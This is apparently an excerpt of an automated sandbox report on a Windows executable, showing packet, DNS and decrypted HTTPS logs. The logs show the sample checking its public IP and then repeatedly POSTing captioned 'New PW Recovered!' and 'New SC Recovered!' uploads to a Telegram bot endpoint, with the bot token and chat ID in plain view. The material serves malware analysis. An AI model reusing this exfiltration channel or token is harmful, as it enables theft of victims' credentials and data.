Jul 26, 2024 00:03:12.777462006 CEST	443	49755	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:12.777539968 CEST	49755	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:12.777878046 CEST	443	49755	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:12.778415918 CEST	443	49755	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:13.121032000 CEST	443	49755	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:13.121134043 CEST	443	49755	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:13.121449947 CEST	49755	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:13.121941090 CEST	49755	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:14.373706102 CEST	49756	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:14.373759031 CEST	443	49756	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:14.373889923 CEST	49756	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:14.374238014 CEST	49756	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:14.374248981 CEST	443	49756	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:15.014398098 CEST	443	49756	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:15.058670044 CEST	49756	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:16.364952087 CEST	49756	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:16.364976883 CEST	443	49756	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:16.397814989 CEST	49756	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:16.397914886 CEST	443	49756	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:16.397995949 CEST	49756	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:16.398122072 CEST	49757	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:16.398159027 CEST	443	49757	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:16.398227930 CEST	49757	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:16.398487091 CEST	49757	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:16.398494005 CEST	443	49757	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:17.038391113 CEST	443	49757	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:17.038465977 CEST	49757	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:17.039900064 CEST	49757	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:17.039906979 CEST	443	49757	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:17.040237904 CEST	443	49757	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:17.041723967 CEST	49757	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:17.084495068 CEST	443	49757	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:17.387037039 CEST	49757	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:17.387085915 CEST	443	49757	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:17.387135029 CEST	49757	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:17.387154102 CEST	443	49757	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:17.387186050 CEST	49757	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:17.387198925 CEST	443	49757	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:17.387254953 CEST	49757	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:17.387329102 CEST	443	49757	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:17.387459040 CEST	443	49757	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:17.388008118 CEST	443	49757	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:17.433679104 CEST	49757	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:17.733129025 CEST	443	49757	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:17.733248949 CEST	443	49757	149.154.167.220	192.168.2.6
Jul 26, 2024 00:03:17.733315945 CEST	49757	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:03:17.733756065 CEST	49757	443	192.168.2.6	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 23:59:14.991641045 CEST	55589	53	192.168.2.6	1.1.1.1
Jul 25, 2024 23:59:14.998450041 CEST	53	55589	1.1.1.1	192.168.2.6
Jul 25, 2024 23:59:16.223233938 CEST	49207	53	192.168.2.6	1.1.1.1
Jul 25, 2024 23:59:16.302690983 CEST	53	49207	1.1.1.1	192.168.2.6
Jul 26, 2024 00:00:51.841928959 CEST	59878	53	192.168.2.6	1.1.1.1
Jul 26, 2024 00:00:51.851747036 CEST	53	59878	1.1.1.1	192.168.2.6
Jul 26, 2024 00:02:07.268716097 CEST	52928	53	192.168.2.6	1.1.1.1
Jul 26, 2024 00:02:07.276221991 CEST	53	52928	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 23:59:14.991641045 CEST	192.168.2.6	1.1.1.1	0x5350	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 23:59:16.223233938 CEST	192.168.2.6	1.1.1.1	0xb73b	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 00:00:51.841928959 CEST	192.168.2.6	1.1.1.1	0x3325	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 00:02:07.268716097 CEST	192.168.2.6	1.1.1.1	0x5104	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 23:59:14.998450041 CEST	1.1.1.1	192.168.2.6	0x5350	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Jul 25, 2024 23:59:14.998450041 CEST	1.1.1.1	192.168.2.6	0x5350	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Jul 25, 2024 23:59:14.998450041 CEST	1.1.1.1	192.168.2.6	0x5350	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Jul 25, 2024 23:59:16.302690983 CEST	1.1.1.1	192.168.2.6	0xb73b	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false
Jul 26, 2024 00:00:51.851747036 CEST	1.1.1.1	192.168.2.6	0x3325	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false
Jul 26, 2024 00:02:07.276221991 CEST	1.1.1.1	192.168.2.6	0x5104	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49716	104.26.13.205	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 21:59:15 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-07-25 21:59:15 UTC	211	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 21:59:15 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8a8f6a828de03344-EWR
2024-07-25 21:59:15 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49717	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 21:59:16 UTC	260	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcacd37f51b3f3 Host: api.telegram.org Content-Length: 975 Expect: 100-continue Connection: Keep-Alive
2024-07-25 21:59:17 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 21:59:17 UTC	975	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 63 64 33 37 66 35 31 62 33 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 63 64 33 37 66 35 31 62 33 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 32 35 2f 32 30 32 34 20 31 37 3a 35 39 3a 31 35 0a 55 73 65 72 Data Ascii: -----------------------------8dcacd37f51b3f3Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcacd37f51b3f3Content-Disposition: form-data; name="caption"New PW Recovered!Time: 07/25/2024 17:59:15User
2024-07-25 21:59:19 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 21:59:19 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49728	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:00:52 UTC	238	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcb9d07bd4088f Host: api.telegram.org Content-Length: 59488 Expect: 100-continue
2024-07-25 22:00:52 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:00:52 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 39 64 30 37 62 64 34 30 38 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 39 64 30 37 62 64 34 30 38 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 31 31 2f 32 30 32 34 20 30 36 3a 33 30 3a 31 34 0a 55 73 65 72 Data Ascii: -----------------------------8dcb9d07bd4088fContent-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcb9d07bd4088fContent-Disposition: form-data; name="caption"New SC Recovered!Time: 08/11/2024 06:30:14User
2024-07-25 22:00:52 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:00:52 UTC	16355	OUT	Data Raw: 62 2b 04 41 0c 08 49 05 5f 2a 37 67 db 70 e0 f3 cf 34 9a f0 4b 6d 7f 7d 0c 4b e4 7d 9d ce dc 71 0c ab 22 06 51 e9 c3 64 7b 1f 63 4e 9e 2b e9 e6 59 5e ea 35 91 66 59 f7 47 0a 26 e7 1d 19 b6 a8 dc 47 be 69 91 59 cf 6f 6f 34 56 d7 3e 5a ce 41 95 76 82 1c 83 91 90 47 ad 79 31 c3 e2 12 df fa d0 f7 5e 2f 0a ed 75 fd 6a 58 bf 17 96 9a 73 3c ba 7c d0 0b 41 11 92 77 88 aa c9 e6 0f 9b 93 c1 da c5 47 e7 50 6a 17 53 f9 7a bc 10 ad a2 47 63 95 d8 e9 fb e6 50 c0 6f 0d b7 a9 27 a6 ee fc 0a 6f f6 7b 66 79 0c c4 cb 70 19 66 62 a0 ef 0d c9 ed eb 4b 3d ad cc f6 cd 6e f7 0a 51 90 23 3f 96 be 63 28 20 80 5f 1b 88 e0 70 4f 61 57 ec 71 1d 59 0b 13 84 be 8a df e4 bf cc bb a9 5c 41 0e a7 71 70 b1 2a d9 c0 ce 26 45 18 50 d1 90 36 fb 6e ca 7f df 47 d2 a1 bf bb 36 97 d3 98 d6 da 3f Data Ascii: b+AI_7gp4Km}K}q"Qd{cN+Y^5fYG&GiYoo4V>ZAvGy1^/ujXs<\|AwGPjSzGcPo'o{fypfbK=nQ#?c( _pOaWqY\Aqp&EP6nG6?
2024-07-25 22:00:52 UTC	16355	OUT	Data Raw: 28 00 a2 8a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 61 45 14 50 01 45 14 50 02 51 4b 49 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 50 69 80 51 45 14 00 52 51 45 03 0a 28 a4 a0 02 8a 28 a0 02 8a 28 a0 61 45 14 1a 00 28 a2 8a 00 4a 28 a2 80 0a 4a 5a 28 18 94 51 45 00 14 94 b4 50 31 28 a2 8a 60 14 51 45 00 14 94 b4 94 00 51 45 14 c0 4a 28 a2 81 85 14 51 40 05 25 2d 14 0c 4a 29 69 28 00 a4 a5 a2 98 09 45 2d 25 20 12 8a 5a 29 8c 4a 29 69 28 00 a2 8a 28 01 28 a5 a2 98 c4 a2 96 8a 00 4e f5 a5 3f 12 91 ec 3f 95 67 0e b5 a5 3f fa df c0 7f 2a ca 7f 12 05 b9 15 14 b4 50 58 94 52 d2 53 18 51 45 14 00 51 45 14 00 51 45 14 00 94 0a 5a 4a 00 28 a5 a4 a0 06 c9 fe a6 5f f7 0d 56 b3 ff 00 5a df 4a b5 27 fa 99 7f dc aa b6 5f eb 1b e9 42 ea 05 ba 28 a2 80 0a 29 68 a0 04 Data Ascii: (((((aEPEPQKI@Q@Q@Q@PiQERQE(((aE(J(JZ(QEP1(`QEQEJ(Q@%-J)i(E-% Z)J)i(((N??g?*PXRSQEQEQEZJ(_VZJ'_B()h
2024-07-25 22:00:52 UTC	9349	OUT	Data Raw: 61 77 2d e5 9d fd ac 0b 73 e4 1f 9a 16 ef 5a 49 6b 0d ee 8b 0d bc eb ba 37 85 01 fc 87 35 9d 14 7a f6 98 a2 08 92 2d 42 dd 78 42 cf b1 c0 f4 39 af 16 9c f4 56 dd 77 ea 8f ac a9 0d 5a 7b 3e dd 18 9e 1c b1 bb 8a ee f2 fa ea 05 b6 f3 c8 db 12 f6 a8 ac 58 4e de 21 bb 8f 98 64 05 15 bd 76 a9 cf f3 15 34 b1 eb ba 9a 98 25 48 b4 fb 76 e1 ca be f7 23 d0 62 af cb 6b 0d 96 87 3d bc 0b b6 34 81 c0 fc 8f 34 54 9e 8e fb be dd 10 53 86 a9 2d 97 7e ac e2 28 a2 8a f6 cf 93 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 29 28 a0 05 e2 92 8a 28 00 a2 8a 28 18 52 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 49 45 14 0c 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 01 45 14 94 0c 28 a2 8a 00 4a 28 a2 81 85 Data Ascii: aw-sZIk75z-BxB9VwZ{>XN!dv4%Hv#bk=44TS-~(((((((()(((RR@EPEPEPIE()((Q@EPEPE(J(
2024-07-25 22:00:52 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 39 64 30 37 62 64 34 30 38 38 66 2d 2d 0d 0a Data Ascii: -----------------------------8dcb9d07bd4088f--
2024-07-25 22:00:53 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:00:53 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49730	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:00:57 UTC	238	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcbd2f89f881a1 Host: api.telegram.org Content-Length: 57562 Expect: 100-continue
2024-07-25 22:00:57 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:00:57 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 64 32 66 38 39 66 38 38 31 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 64 32 66 38 39 66 38 38 31 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 31 35 2f 32 30 32 34 20 31 33 3a 32 38 3a 32 31 0a 55 73 65 72 Data Ascii: -----------------------------8dcbd2f89f881a1Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcbd2f89f881a1Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/15/2024 13:28:21User
2024-07-25 22:00:57 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:00:57 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:00:57 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:00:57 UTC	7423	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:00:57 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 64 32 66 38 39 66 38 38 31 61 31 2d 2d 0d 0a Data Ascii: -----------------------------8dcbd2f89f881a1--
2024-07-25 22:00:58 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:00:58 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49731	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:00:58 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcbf70b25255b6 Host: api.telegram.org Content-Length: 57562 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:00:59 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:00:59 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 66 37 30 62 32 35 32 35 35 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 66 37 30 62 32 35 32 35 35 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 31 38 2f 32 30 32 34 20 31 30 3a 31 39 3a 